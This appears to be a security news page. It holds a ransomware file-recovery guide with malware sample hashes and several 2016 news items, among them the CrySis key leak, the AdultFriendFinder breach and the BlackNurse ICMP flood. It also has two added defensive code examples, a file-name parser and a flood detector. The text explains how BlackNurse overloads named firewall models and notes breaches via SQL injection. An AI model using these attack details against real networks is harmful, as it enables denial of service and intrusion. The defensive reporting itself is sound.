In this guide, we will explain how to recover encrypted files focusing on the Data-Locker Ransomware that targets the Windows operating system.
Why does my system ask me to pay?

Ransomware is malware that restricts access to a system and asks for a ransom in order to remove that restriction.
The restriction applied to the system can change over time and can be implemented in various ways.
Based on the restriction applied to the system, we can distinguish two kinds of ransomware by their behavior:

PC-Locker Ransomware:
They block the system by showing a ransom page on the computer desktop, where they intimidate the victim with a message and ask for a ransom in order to unlock the machine.
Data-Locker Ransomware:
They encrypt a large amount of user data while avoiding the system files (so that the machine keeps working) and then ask for a ransom to unlock those files.
The main goal of ransomware is to extort money from its victims using some technique (locking the system, encrypting files) that can target different devices (desktop, laptop, tablet, smart watch, smart TV, smartphone) and different operating systems (Windows, Linux, OS X).

When do you know you have been infected by ransomware?
Any time your system asks you to pay. As we said, the main goal of ransomware is to get money from its victims, so the first action the ransomware takes after infection is to show a window containing the instructions (the ransom note) to make a payment through a cryptocurrency such as bitcoin.
Ransomware that infects your system and then remains stealthy will never exist.

In this guide we will focus on the Data-Locker Ransomware that targets the Windows operating system.

There are many types of ransomware, and each type, known as a family, behaves differently, so there is no general, always-working methodology to recover your data.

Once you have been infected by ransomware, follow these steps if you want to restore your files and your system:

Unlock the screen and bypass the ransomware’s screen lock;
Restore/decrypt the files;
Disinfect the machine and remove the ransomware’s persistence files.
Note that this guide aims only to recover your encrypted files, not to remove the ransomware and disinfect your machine.
We strongly recommend, once you have recovered your files, saving them on an external drive and removing the ransomware from the system (or formatting the drive), because the ransomware may trigger its activity again and encrypt all of the files you have just recovered.
Some modern ransomware combines the data-locker and PC-locker techniques, so you need to unlock the screen and bypass the ransomware’s screen lock before you start to recover your encrypted files.
In that case, we recommend booting the operating system in Safe Mode with Networking before following our recovery methods.
This also avoids having to fight mechanisms where the ransomware deletes files after a certain amount of time.

The methods we explain below are not a way to fight this threat; the best defenses against ransomware are frequent backups and prevention.
That means that if you get infected by ransomware it is already “late” and, even though many researchers are fighting this threat by developing ad-hoc decryption tools, some ransomware families are really hard to deal with.

METHOD 1: Identification and Decryption Tool

If you have been infected by ransomware and want to ask other users for help (e.g. forums, IRC, email) or check whether a security firm has developed a decryption tool for that specific ransomware, you first have to identify the family name of the ransomware.

MalwareHunterTeam has set up a free web service, ID Ransomware, that lets you upload an encrypted file (or ransom note); it detects the ransomware family name and, in some cases, guides you to decrypt the files of that family.


The following is a step-by-step real case of using this method to decrypt files encrypted by the TeslaCrypt 4.0 ransomware.


As we can see in the above image, the ID Ransomware home page allows you to upload a ransom note or a sample encrypted file for family recognition.
In the case of TeslaCrypt 4.0 we will use a ransom note, because that family does not add an extension to encrypted files, so it would be harder to identify the family from an encrypted file.
We strongly recommend not uploading huge files, because recognition does not improve with the size of the file; it would just be a waste of resources.


Once the upload is completed, you get the result with the family name that ID Ransomware identified by pattern matching on the uploaded ransom note.
In this case, TeslaCrypt 4.0 is recoverable and the service provides a link that explains how to decrypt the files and which tools to use.


We download the decryption tool developed by BloodDolly, and we first need to set the key used by the ransomware to encrypt our files.


We need to do this because it is a multi-purpose decryption tool for all the TeslaCrypt versions (1 to 4).
Selecting the extension appended to the encrypted files by the ransomware allows the tool to set the master key automatically.
In our case (TeslaCrypt v4) we select the last option, <as original>, because that ransomware left the extension of our encrypted files unchanged.


Once the key is set, we can start to recover our files.
In our case, the tool decrypted 100% of our files, as we can see in the following picture.


We also recommend searching Google for “<ransomware_family_name> decryption tool” and looking around for a decryption tool that ID Ransomware has not spotted (which rarely happens).

METHOD 2: Recover from shadow copies

The shadow copies service is a set of COM interfaces that implements a framework to allow volume backups to be performed while applications on a system continue to write to the volumes.
For example, when we create a restore point, we also save a volume backup (containing the shadow copies), and we can restore files from that backup.
This is a built-in feature of all Windows operating systems starting from Windows XP, so most probably you have shadow copies without knowing it.

We will use a free tool, ShadowExplorer, that allows us to browse our shadow copies; you can download it here.
Note that if you have Windows XP you have to download the old version of this tool.
If you renamed the vssadmin.exe utility for security reasons, you must restore its original name so that it works normally; otherwise the tool will not run correctly.

The following is a step-by-step real case of using this method to restore files encrypted by the Jigsaw ransomware.


The main window of ShadowExplorer lets us choose the drive whose shadow copies we want to explore and the date of the snapshot we want to consult, because there may be more than one snapshot of the volume backup (i.e. two or more restore points).


Once you identify the data you want to recover, right-click on the folder and export the files.


In our case, we recovered 100% of our files, as we can see in the above picture, because the Jigsaw ransomware does not delete the shadow copies.
This method is not really effective on the host infected directly by the ransomware, because most ransomware deletes the shadow copies through the vssadmin tool.
It is really effective when ransomware spreads over the network, encrypting the files on all hosts linked to the local network, because on those hosts it cannot access operating system functionality such as the vssadmin utility.
So the shadow copies are still alive on all the machines hit indirectly by the ransomware.

We strongly recommend disabling vssadmin.exe to prevent ransomware from deleting the Windows shadow copies, which in most cases let the victim restore the files encrypted on the operating system drive.

METHOD 3: Data recovery tool

Data recovery is, simply, the salvaging and repair of data that has been lost.
Of course, data recovery won’t always be possible; sometimes a system can be too corrupted or damaged to get much of the data back.

In this guide we will not cover the techniques used by data recovery tools to restore data; what we need to know is that the success of file recovery depends on many variables (such as operating system partitioning, file-overwriting priority, drive space handling …). If you want more information, you can check this.

There are many data recovery tools available on the web; you can check a list here.
In this guide, we will use a free data recovery tool called Recuva.

The following is a step-by-step real case of using this method to restore files encrypted by the Locky.Odin ransomware.


We strongly recommend installing Recuva on an external USB drive rather than on your OS drive, so that the installation itself does not overwrite deleted data and the probability of recovering your files is higher.

Once installed, a scan wizard is displayed; we recommend closing it in order to set the following options for the scanning phase:


We recommend setting these options because they are not enabled by default.
Activating “Restore folder structure” allows us to keep the directory tree structure and to infer the names of all our encrypted files.

Then we can run our scan on the desired drive and wait for it:


When Recuva finishes scanning for deleted files, it shows a window listing all potentially recoverable files.
Of course, not all the files can be recovered.
The “State” column tells us whether a file can be recovered.
“Partly recoverable” files are those that cannot be recovered in full; for example, a txt file would contain half of its text recovered and the other half corrupted.

The “Comment” column lets us match the encrypted, renamed files with their original file names.
In this way, even if we cannot recover the file, we can recover its name.
We can check all the files we want to recover and decide where to export them.

In the right corner there is the “Switch to advanced mode” button, which lets us apply filters, based on file path, to the recoverable files.
So we will apply the following filters:
C:\Personal_Data, C:\Users\Administrator\Personal_Data, C:\Users\Administrator\Desktop\Personal_Data
and check all the files we want to export.

We strongly recommend exporting all the data to an external drive in order to improve the chances of recovering more data.


Out of a total of 3002 files, 915 were fully recovered, that is about 30%, counting only the fully recovered files.

This method is also useful for recovering the names and paths of the encrypted files, because some ransomware renames files to random digits and we cannot even recognize which files we lost.


So how effective are our methods?
We gathered a set of ransomware samples (the most recent families) and ran them in our virtual machine in order to test the percentage of files recovered with each method.

To evaluate the recovery rate of each method for each ransomware, we use a folder (Personal_Data) containing 1000 elements (pdf, jpg, ppt, txt, doc, xls), placed in 3 different locations on the system:

Then we try to recover our files using our methods. We calculate the percentage of successfully recovered files for each folder and repeat the test, running the ransomware 3 times in different system states; in the end we report the average percentage of recovered files.
For our test we will use the following samples of ransomware:

Cerber v.1 md5: 9a7f87c91bf7e602055a5503e80e2313
Jigsaw md5: 2773e3dc59472296cb0024ba7715a64e
TeslaCrypt v.4 md5: 0265f31968e56500218d87b3a97fa5d5
CryptXXX v.2 md5: 19127d5f095707b6f3b6b027d7704743
Bart md5: d9fe38122bb08d96ef0de61076aa4945
CryptXXX v.4 md5: 631c36f93b0fc53b8c7be269b02676d0
Bart v.2 md5: 4741852c23364619257c705aca9b1be3
Satana Ransomware md5: 46bfd4f1d581d7c0121d2b19a005d3df
Odin md5: 01f7db952b1b17d0a090b09018896105
Crypt888 md5: 86c85bd08dfac63df65eaeae82ed14f7


CrySis ransomware decryption keys published online
18.11.2016 securityaffairs Virus

The decryption keys for the CrySis ransomware were posted online on the BleepingComputer forums by a user known as crss7777.
Good news for the victims of the CrySis ransomware: on Sunday the master decryption keys were released to the public. Security experts from Kaspersky Lab have already included the decryption keys in the Rakhni decryptor, allowing victims of CrySis versions 2 and 3 to recover their files.

The keys were posted by a user known as crss7777, who shared a link to a C header file containing the actual master decryption keys and information on how to use them.

“In a surprise move, the master decryption keys for the CrySiS Ransomware have been released early this morning in a post on the forums. At approximately 1 AM EST, a member named crss7777 created a post in the CrySiS support topic at BleepingComputer with a Pastebin link to a C header file containing the actual master decryption keys and information on how to utilize them,” wrote Lawrence Abrams from BleepingComputer.

“These keys have already been used by Kaspersky Labs to update their RakhniDecryptor program so that it can be used to decrypt victim’s files.”


Lawrence Abrams speculates the user crss7777 could be a member of the development team.

“Though the identity of crss7777 is not currently known, the intimate knowledge they have regarding the structure of the master decryption keys and the fact that they released the keys as a C header file indicates that they may be one of the developers of the CrySiS ransomware,” said Abrams.

“Why the keys were released is also unknown, but it may be due to the increasing pressure by law enforcement on ransomware infections and the developers behind them.”

The CrySis ransomware was first spotted in February by experts at Eset; the malware has infected systems mostly in Russia, Japan, South and North Korea, and Brazil.

The threat is spread via email attachments with double file extensions or via malicious links embedded in spam emails.

The CrySis ransomware appends the .xtbl extension to the encrypted files, which are renamed using the format [filename].id-[id].[email_address].xtbl. Detailed instructions to decrypt the files have been published.
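As an added example (not code from the article, Kaspersky or BleepingComputer), the following parser handles the naming scheme described above so that an incident responder can inventory encrypted files and group them by victim id and contact address before running a decryptor; the alphanumeric id, the e-mail shape and the sample names are assumptions.

```python
"""Recognise files renamed by CrySis and recover the original names.

Added example, not code from Kaspersky, BleepingComputer or the article.
It parses the naming scheme the article gives:
    [filename].id-[id].[email_address].xtbl
"""
import re
from collections import defaultdict
from typing import Dict, Iterable, List, NamedTuple, Optional


class CrysisName(NamedTuple):
    original: str   # filename before encryption, extension included
    victim_id: str  # per-victim id embedded in the name
    email: str      # attacker contact address embedded in the name


# Assumptions: the id is alphanumeric, the e-mail contains exactly one '@' and
# no whitespace. Regex backtracking lets the original name keep its own dots
# and lets the e-mail domain keep its dots without swallowing ".xtbl".
_CRYSIS_RE = re.compile(
    r"^(?P<original>.+)\.id-(?P<victim_id>[A-Za-z0-9]+)"
    r"\.(?P<email>[^\s@]+@[^\s@]+)\.xtbl$",
    re.IGNORECASE,
)


def parse_crysis_name(name: str) -> Optional[CrysisName]:
    """Return the parsed parts, or None when the name is not CrySis-style."""
    m = _CRYSIS_RE.match(name)
    if not m:
        return None
    return CrysisName(m.group("original"), m.group("victim_id"), m.group("email"))


def triage(names: Iterable[str]) -> Dict[str, object]:
    """Split a file listing into encrypted files grouped by id/email, and untouched files."""
    campaigns: Dict[str, List[str]] = defaultdict(list)
    clean: List[str] = []
    for name in names:
        parsed = parse_crysis_name(name)
        if parsed is None:
            clean.append(name)
        else:
            campaigns[f"{parsed.victim_id}/{parsed.email}"].append(parsed.original)
    return {"campaigns": dict(campaigns), "clean": clean}


# Constructed sample listing (not real victim data).
SAMPLE_NAMES = [
    "Q3_report.docx.id-A1B2C3D4.decrypt@example.com.xtbl",
    "family.photo.jpg.id-A1B2C3D4.decrypt@example.com.xtbl",
    "notes.txt",
    "budget.xlsx.id-FFEE0011.other.key@example.net.xtbl",
    "odd.bin.id-XYZ.no-at-sign.xtbl",  # looks similar but has no e-mail, left alone
]

if __name__ == "__main__":
    result = triage(SAMPLE_NAMES)
    for key, files in result["campaigns"].items():
        print(f"{key}: {len(files)} file(s) -> {files}")
    print("untouched:", result["clean"])
```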

CVE-2016-7461 code execution flaw affects VMware Workstation
18.11.2016 securityaffairs Vulnerebility

VMware has patched a critical out-of-bounds memory access vulnerability, tracked as CVE-2016-7461, affecting its Workstation and Fusion products.
The flaw, which resides in the drag-and-drop function, can be exploited by attackers to execute arbitrary code on the host operating system running Fusion or Workstation.

The security vulnerability affects Workstation Player and Pro 12.x and Fusion (Pro) 8.x, while ESXi is not affected.

The flaw was reported at the 2016 PwnFest hacking contest, held in South Korea at the 2016 Power Of Community (POC) security conference. The hackers earned $140,000 for the Windows Edge hacks, while the Qihoo hacker team and Lee earned $150,000 for the hack of VMware Workstation 12.5.1.


VMware patched the vulnerability with the release of versions 12.5.2 and 8.5.2.

“Problem Description

a. VMware Workstation and Fusion out-of-bounds memory access vulnerability

The drag-and-drop (DnD) function in VMware Workstation and Fusion has an out-of-bounds memory access vulnerability. This may allow a guest to execute code on the operating system that runs Workstation or Fusion.” states the advisory published by VMware.

VMware explained that the flaw cannot be exploited against Workstation Pro or Fusion when both the drag-and-drop and copy-and-paste functions are disabled, while it remains exploitable on Workstation Player.

Recently VMware released several security updates to fix the local privilege escalation flaw in the Linux kernel known as Dirty COW, tracked as CVE-2016-5195.

“The Linux kernel which ships with the base operating system of VMware Appliances contains a race condition in the way its memory subsystem handles copy-on-write (aka “Dirty COW”). Successful exploitation of the vulnerability may allow for local privilege escalation. The product lines listed in this advisory have been confirmed to be affected.” reads the advisory from

Security patches for Identity Manager, vRealize Automation and version 5.x of vRealize Operations are still pending.

NIST Small Business Information Security guide for Small businesses
18.11.2016 securityaffairs Safety

The NIST Small Business Information Security: The Fundamentals guide aims to provide basic cybersecurity recommendations to small businesses.
I have always stressed the necessity of improving the cybersecurity posture of small businesses, which are the most exposed to threat actors across the world. Now the National Institute of Standards and Technology has released a cybersecurity guide to support small businesses in securing their IT infrastructure.

The NIST “Small Business Information Security: The Fundamentals” guide aims to provide basic cybersecurity recommendations for small businesses through a risk assessment process.

“Businesses of all sizes face potential risks when operating online and therefore need to consider their cybersecurity,” she said. “Small businesses may even be seen as easy targets to get into bigger businesses through the supply chain or payment portals.” reads the NIST announcement.

“Many small businesses think that cybersecurity is too expensive or difficult; Small Business Information Security is designed for them,” Toth said. “In fact, they may have more to lose than a larger organization because cybersecurity events can be costly and threaten their survival.” In fact, the National Cyber Security Alliance found that 60 percent of small companies close down within the six months following a cyberattack.


This guide is an important exercise for small-business owners who are not experienced in cybersecurity; it explains to them how to protect their information systems from cyber threats.

The Small Business Information Security: The Fundamentals guide proposes a classic approach that follows the IDENTIFY/PROTECT/DETECT/RESPOND/RECOVER steps, focusing on understanding and managing risks for small businesses. The guide also includes worksheets that small businesses can use to identify the information they manage. It is essential to assess the information assets and identify the potential risks to them.

Of course, the guide is based on NIST’s Framework for Improving Critical Infrastructure Cybersecurity, which was issued in 2014.

The NIST highlighted that the new guide describes how to:

limit employee access to data and information;
train employees about information security;
create policy and procedures for information security;
encrypt data;
install web and email filters; and
patch, or update, operating systems and applications.
The guide also suggests installing surge protectors and uninterruptible power supplies, considering transferring risk through cybersecurity insurance, and finding reputable cybersecurity contractors.

The hacker Kapustkiy continues to target embassies and universities
18.11.2016 securityaffairs Hacking

The hacker Kapustkiy is back and has breached another embassy and two universities. He leaked the data on Pastebin.
The security pentester who goes online with the moniker Kapustkiy continues to target organizations and embassies across the world.

Recently he breached the Paraguay Embassy of Taiwan, while a few days ago the hacker and his friend Kasimierz (@Kasimierz_) hacked the Indian Embassies in Switzerland, Mali, Romania, Italy, Malawi, and Libya.

The latest victims of the hacker are two subdomains of Virginia University and the University of Wisconsin, and another embassy, the Indian Embassy in New York.

Kapustkiy @Kapustkiy
Virginia & Wisconsin Sub Domain #Hacked #Leaked
17:52 - 12 Nov 2016
He contacted me via Twitter to report the data breaches; in the case of the Indian Embassy in New York he explained that he leaked only a small portion of the stolen data, which doesn’t include US personnel.

“Hi, Its me Kaputski, A few weeks ago I breached several websites that were related to the Indian ShitEmbassy. So I thought they will fix all the vulnerables in there domains and also look at there other domains that maybe could have a simple ”SQLi” vulnerable. So guess what? they did not look at all and only fixed some of there domains SMH……….” wrote Kapustkiy.

“I’m tired to report all the errors that I find in there website that I decided to breach them, NOW FIX YOUR SECURITY FUCKING ADMINS! NOTE: There was also a table named ”Newyork_contact” which had 7000 entries. I didn’t leak that out of privacy of people. Also the table ”Newyork_registration” had also information like Address,City,zipcode,phone number” I only leaked this but it could be more.”.

The databases related to the universities include users’ personal information such as names, logins, passwords, phone numbers and much other information about students and staff.

As you can see, in some cases the passwords are stored in plain text.


Records belonging to the hacked embassy also include phone numbers; let me highlight once again that this kind of information is a precious commodity for nation-state hackers who intend to launch a spear phishing campaign against diplomats.

Kapustkiy explained that he leaked the data because the administrators of the targeted entities ignored the warnings he sent via email.

It is likely Kapustkiy exploited SQL injection flaws in the latest string of data breaches.

Who is the next one?

Russia is going to ban LinkedIn after court ruling. What’s next?
18.11.2016 securityaffairs Social

Russia is going to ban Linkedin after a court ruling that found the professional social network to be in violation of the country’s data protection laws.

On Thursday, a Moscow court confirmed the decision to ban the professional social network LinkedIn in Russia. LinkedIn is violating the country’s data protection laws, which since September 2015 require foreign and Russian companies to store the personal data of Russian users within the country’s borders.

This summer a court ruled in favor of Roskomnadzor, the Federal Service for Supervision in the Sphere of Telecom, Information Technologies and Mass Communications, explaining that LinkedIn didn’t comply with Russian law.

LinkedIn is not storing information about Russians on servers inside the country, and it is processing information about third parties who aren’t registered on the site and haven’t signed the company’s user agreement.

The Russian Personal Data Law has been in force since September 1st, 2015; it requires foreign tech companies to store the personal data of Russian citizens within the country. The law was designed to protect Russian citizens from the surveillance activities of foreign agencies such as the NSA.

“On Aug. 4, Moscow’s Tagansky Court approved a request from Russia’s communications watchdog Roskomnadzor to add LinkedIn to a list of Internet sites that violated Russia’s personal data laws. ” reported the Moscow Times

“On Sept. 1 2015, amendments to the law “On Personal Data,” which requires the localization of personal data on the territory of Russia, came into effect. Any Russian or foreign company working with Russian users must ensure recording, systematization, accumulation, storage and clarification of personal data of Russians using databases on Russian territory.”


LinkedIn is just the first firm that could be targeted by Roskomnadzor, which is now threatening other tech giants, including WhatsApp, Facebook, and Twitter.

“The Russian court’s decision has the potential to deny access to LinkedIn for the millions of members we have in Russia and the companies that use LinkedIn to grow their businesses. We remain interested in a meeting with Roskomnadzor to discuss their data localization request,” reads a statement from LinkedIn.

Some companies like Google and Apple have already moved some of their infrastructure to Russia this year, unlike Microsoft, Facebook and Twitter, which decided not to comply with the Russian law.

The ban could take effect today, with Russian internet service providers blocking access to LinkedIn. LinkedIn could still appeal the court’s decision to avoid being blocked across the country.

Russia isn’t the only country adopting such a law; Germany passed similar legislation that forces tech companies to store German users’ data on servers located in the country.

“A number of American tech companies are investing billions of dollars combined to build data centers across Europe to comply with such rules.” reported the NYT.

In Brazil, a judge also blocked WhatsApp, the internet messaging service, after the company, which is owned by Facebook, refused to hand over data to help in a criminal investigation.

In May, a Brazilian judge ordered ISPs to block access to the WhatsApp messaging service for 72 hours; it was the second time in five months.

Brazilian authorities ordered ISPs to block WhatsApp in a dispute over access to encrypted data. The order to block the messaging service for 72 hours was issued by a judge from the Brazilian state of Sergipe, and the ISPs were obliged to comply with the order to avoid facing fines.

According to the Brazilian newspaper Folha de S.Paulo the ban impacted more than 100 million Brazilian users.

Were the Recent Arrests in Ohio Part of ISIS ’ Catastrophic Plan for the US?
18.11.2016 securityaffairs Cyber

On November 7, Southern Ohio’s Joint Terrorism Task Force (JTTF) arrested Aaron Travis Daniels, of Ohio, on terror-related charges as he was attempting to travel to Libya to become an ISIS fighter.
Daniels, age 20, who goes by the aliases Harun Muhammad and Abu Yusef, had allegedly “communicated his commitment to violent overseas jihad” in addition to having wired money to an ISIS recruiter and “external attack planner,” according to the Department of Justice.

Daniels is being held without bond. The arrest comes just days after it was reported that ISIS was planning an onslaught of attacks around the world, including quite possibly Chardon, Ohio. Chardon is a town in which BLACKOPS Cyber, a private intelligence company, caught ISIS communications regarding hacking internet surveillance cameras which can assist terrorists not only in carrying out attacks, but in doing so undetected.


Though it is uncertain as to whether the arrest was related to that ISIS plot, Daniels had also allegedly wired money to an intermediary of now-deceased Abu Isa Al-Amriki, who was an ISIS recruiter and attack strategist.

Also in Ohio, the Islamic State instructed Munir Abdulkader to kill a U.S. service member and attack a police station.

“‘Abdulkader was specifically tasked by Hussein and ISIL with killing an individual in the United States,’ Court Documents provided to The DCNF from the Program on Extremism at The George Washington University reveal. Abdulkader’s director Junaid Hussain, a British teenager, was reportedly killed by a U.S. drone strike outside of ISIS’s capital city of Raqqa.

Abdulkader was reportedly an Eritrean immigrant to the U.S. and became a naturalized U.S. citizen in 2006. University records show he was once enrolled at Xavier University, and the University of Cincinnati.”
On July 7, Abdulkader pled guilty “to attempting to kill officers and employees of the United States, possession of a firearm in furtherance of a crime of violence and providing material support to ISIS. The sentencing memorandum states that, “the Defendant placed himself under the direction and control of a pernicious foreign terrorist organization and plotted with that organization to conduct multiple murderous attacks in the Cincinnati area.”

Abdulkader was reportedly cautioned by Hussain that traveling to Syria was too much of a risk, so he should “consider a violent attack within the United States” instead.

The terror-linked arrests in Ohio may be indicative of calls ISIS has made on numerous occasions in regard to the U.S.:

The May 2015 issue of Dabiq, the official magazine of ISIS, warns that “the Islamic State… have every intention of attacking America on its home soil… looking to do…something that would make any past operation look like a squirrel shoot…something truly epic.”
In a recent court case, several Minnesota men were nabbed while plotting to join ISIS and bring fighters into the U.S., through the southern border.
According to a report by Rep. Duncan D. Hunter (R-CA), at least 10 ISIS fighters have been caught trying to enter the U.S. through the southern border (and, that was in 2014).
Following a Brussels attack earlier in the year, threats of future attacks, such as the following, were posted on social media: “What will be coming is worse.” And, “With the permission of God, the lions came to take revenge for the killing of Muslims in Syria and Iraq.” Many of the messages contained graphic images from the attacks.
In April, the number of terrorists in the U.S. surged to an unprecedented level – up 180%, with fewer leaving to fight jihad elsewhere.
Terrorist migration and a fresh wave of terror attacks is forecast for the U.S. According to FBI Director James Comey, an unprecedented surge of ISIS fighters will advance into Western nations as the terror group has been losing ground in Iraq and Syria.
Around a year ago, Islamic State spokesman Abu Muhammad al-Adnani, who has since been killed, disclosed the terrorist group’s plans for Christians, Jews & The U.S.
“And Tomorrow in Britain and America” — ISIS-Affiliated Media Sends Chilling Warnings
These threats are made even more chilling by the fact that the FBI has repeatedly stated the bureau is overwhelmed by the number of terror-related cases in the U.S. The FBI has said it has over 1,000 active cases related to ISIS open. You can help by reporting suspicious activity related to terrorism. Your attentiveness can save lives.

AdultFriendFinder company data breach exposes 412 million accounts
18.11.2016 securityaffairs Crime

The company that owns AdultFriendFinder and other adult websites has been hacked; the data breach exposes 412 million accounts, making this the largest hack of 2016.
Almost every account password was cracked, thanks to the company’s poor security practices. Even “deleted” accounts were found in the breach.

A new massive data breach is in the headlines; the victim is the adult dating and entertainment company Friend Finder Network. The data breach has exposed more than 412 million accounts, 339 million of which from the and over 15 million “deleted” accounts that were still present in the database.

A close look at the databases revealed that 62 million belong to, and 7 million from, the remaining records come from other brands of Friend Finder Network.

Below is the data provided by the breach notification service LeakedSource, which examined the stolen data:

“Friend Finder Network Inc is a company that operates a wide range of 18+ services and was hacked in October of 2016 for over 400 million accounts representing 20 years of customer data which makes it by far the largest breach we have ever seen — MySpace gets 2nd place at 360 million. This event also marks the second time Friend Finder has been breached in two years, the first being around May of 2015.” reads the post published by LeakedSource.

A list of sites we have verified, how many affected accounts and a brief description are as follows:
339,774,493 users
“World’s largest sex & swinger community”
62,668,630 users
“Where adults meet models for sex chat live through webcams”
7,176,877 users
Adult magazine akin to Playboy
1,423,192 users
Another 18+ webcam site
1,135,731 users
“Free Live Sex Cams”
Unknown domain
35,372 users
It seems that attackers exploited a local file inclusion flaw in the AdultFriendFinder website that was first reported by the security researcher known as Revolver.

Revolver explained that the exploitation of the flaw on the AdultFriendFinder site could allow a remote attacker to run malicious code on the target web server.

It is still a mystery who is behind the data breach; Revolver denied any involvement in the attack and blamed users of a Russian hacking site instead.

This is the second time Friend Finder Networks has been breached by hackers; the first attack occurred in May 2015, when the attackers exposed almost 4 million accounts.

The analysis of the three largest sites’ databases revealed that the stolen data includes email addresses, usernames, passwords, site membership data, the IP address last used to log in, and the date of the last visit.

The databases don’t contain sexual preference information, unlike the previous data breach.

The users’ passwords were either stored in plaintext or hashed with SHA-1, which makes it easy for hackers to crack them.

LeakedSource has already cracked 99 percent of all the passwords included in the databases.

Below is the list of the top ten passwords from the AdultFriendFinder website:


LeakedSource also published a table of the top email providers used, from only. The vast majority of emails are (96,487,200), (74,563,930), and (61,754,102).

“There are 5,650 .gov registered emails on all websites combined and 78,301 .mil emails.” states LeakedSource.

LeakedSource confirmed that it will not make the data searchable by the general public for various reasons.

BlackNurse attack, how to knock big servers offline with a laptop
18.11.2016 securityaffairs Attack

The BlackNurse attack allows attackers to power massive DDoS attacks that are able to knock large servers offline with limited resources.
Researchers discovered a simple method, called BlackNurse attack, to power massive DDoS attacks that could allow lone attackers to knock large servers offline with limited resources.

“This attack is not based on pure flooding of the internet connection, and we have named it ‘BlackNurse’. BlackNurse is not the same as an old ICMP flood attack which is known to send ICMP requests to the target very quickly. BlackNurse is based on ICMP with Type 3 Code 3 packets. ” reads the analysis published by the researchers.


The BlackNurse attack was devised by researchers from the Danish TDC Security Operations Center; it could be effective against servers protected by certain firewalls made by Cisco Systems, Palo Alto Networks, SonicWall, and Zyxel.

“The BlackNurse attack attracted our attention, because in our anti-DDoS solution we experienced that even though traffic speed and packets per second were very low, this attack could keep our customers’ operations down. This even applied to customers with large internet uplinks and large enterprise firewalls in place. We had expected that professional firewall equipment would be able to handle the attack.” continues the report.

The BlackNurse attack leverages ICMP Type 3 Code 3 packets, which are used by routers and networking equipment to send and receive error messages.

By sending this specific type of ICMP packet, attackers can overload the CPUs of certain types of server firewalls.

The researchers noticed that after reaching a threshold of 15 Mbps to 18 Mbps, the network devices drop so many packets that the server will go offline.

The researchers from the TDC SOC explained that the BlackNurse attack could allow a lone attacker with a single laptop to power DDoS attacks peaking at 180 Mbps.

“It does not matter if you have a 1 Gbit/s Internet connection. The impact we see on different firewalls is typically high CPU loads. When an attack is ongoing, users from the [local area network] site will no longer be able to send/receive traffic to/from the Internet. All firewalls we have seen recover when the attack stops.” reads the analysis of the TDC SOC.
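The following detector is an added example (not code from TDC SOC, Netresec or the article): it bins packet metadata into one-second windows, alerts when the ICMP Type 3 Code 3 (destination unreachable, port unreachable) traffic in a window crosses a bandwidth or packet-rate threshold, and then shows what a per-class rate limit, which the device list notes keeps some routers unaffected, does to the same capture. The 15 Mbps threshold is the low end of the range quoted above; the 40,000 pps threshold, the 1,000 pps limit, the Packet record layout and the sample capture are assumptions.

```python
"""Flag a BlackNurse-style flood of ICMP Type 3 Code 3 packets in capture metadata.

Added example, not code from TDC SOC, Netresec or the article. Thresholds:
15 Mbps is the low end of the range the article reports; 40,000 pps and the
1,000 pps rate limit are assumed tuning values.
"""
from collections import Counter, defaultdict
from dataclasses import dataclass
from math import floor
from typing import Dict, Iterable, List, Optional, Tuple


@dataclass(frozen=True)
class Packet:
    ts: float                        # capture timestamp, seconds
    src: str                         # source address as text
    length: int                      # bytes on the wire
    icmp_type: Optional[int] = None  # None for non-ICMP traffic
    icmp_code: Optional[int] = None


@dataclass
class Alert:
    window_start: float
    pps: int
    mbps: float
    top_sources: List[Tuple[str, int]]


def is_port_unreachable(p: Packet) -> bool:
    """ICMP type 3 / code 3: the packet type BlackNurse relies on."""
    return p.icmp_type == 3 and p.icmp_code == 3


def detect_blacknurse(packets: Iterable[Packet], mbps_threshold: float = 15.0,
                      pps_threshold: int = 40_000, window: float = 1.0) -> List[Alert]:
    """Return one Alert per window whose type-3/code-3 traffic breaches a threshold."""
    by_window: Dict[float, List[Packet]] = defaultdict(list)
    for p in packets:
        if is_port_unreachable(p):
            by_window[floor(p.ts / window) * window].append(p)
    alerts: List[Alert] = []
    for start in sorted(by_window):
        pkts = by_window[start]
        pps = len(pkts) / window
        mbps = sum(p.length for p in pkts) * 8 / window / 1_000_000
        if pps >= pps_threshold or mbps >= mbps_threshold:
            # Who is sending: one address points at a single host, many at spoofing.
            top = Counter(p.src for p in pkts).most_common(3)
            alerts.append(Alert(start, int(pps), round(mbps, 2), top))
    return alerts


def rate_limit(packets: Iterable[Packet], max_pps: int = 1_000,
               window: float = 1.0) -> Tuple[List[Packet], int]:
    """Pass at most max_pps type-3/code-3 packets per window; everything else passes.

    Mirrors a per-class ICMP rate limit on a router or firewall. Returns the
    surviving packets and the number dropped.
    """
    seen: Counter = Counter()
    passed: List[Packet] = []
    dropped = 0
    for p in packets:
        if is_port_unreachable(p):
            key = floor(p.ts / window)
            seen[key] += 1
            if seen[key] > max_pps:
                dropped += 1
                continue
        passed.append(p)
    return passed, dropped


def constructed_capture() -> List[Packet]:
    """Constructed two-second capture: background noise, then a one-host flood."""
    pkts: List[Packet] = []
    # Second 0: a handful of legitimate port-unreachable replies from five hosts.
    for i in range(50):
        pkts.append(Packet(ts=i * 0.02, src=f"10.0.0.{i % 5 + 1}", length=70,
                           icmp_type=3, icmp_code=3))
    # Both seconds: ordinary TCP traffic, which the detector ignores.
    for i in range(200):
        pkts.append(Packet(ts=i * 0.01, src="10.0.1.1", length=1400))
    # Second 1: one source sends 60,000 type-3/code-3 packets of 70 bytes (33.6 Mbps).
    for i in range(60_000):
        pkts.append(Packet(ts=1.0 + i / 60_000, src="203.0.113.7", length=70,
                           icmp_type=3, icmp_code=3))
    return pkts


if __name__ == "__main__":
    capture = constructed_capture()
    for a in detect_blacknurse(capture):
        print(f"t={a.window_start:.0f}s {a.pps} pps {a.mbps} Mbps from {a.top_sources}")
    survivors, dropped = rate_limit(capture)
    print(f"after rate limit: dropped {dropped}, alerts={detect_blacknurse(survivors)}")
```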

The experts confirmed that in the last two years 95 other DDoS attacks leveraging the ICMP protocol targeted customers inside the TDC network, but it is not specified how many of them were BlackNurse attacks.

Experts from Netresec, who supported the TDC team in the analysis, confirmed that the attack works against several models of firewalls from major vendors, including Cisco Systems, Palo Alto Networks, SonicWall, and Zyxel.

Devices verified by TDC to be vulnerable to the BlackNurse attack:

Cisco ASA 5506, 5515, 5525 (default settings)
Cisco ASA 5550 (Legacy) and 5515-X (latest generation)
Cisco Router 897 (unless rate-limited)
Palo Alto (unverified)
SonicWall (if misconfigured)
Zyxel NWA3560-N (wireless attack from LAN Side)
Zyxel Zywall USG50
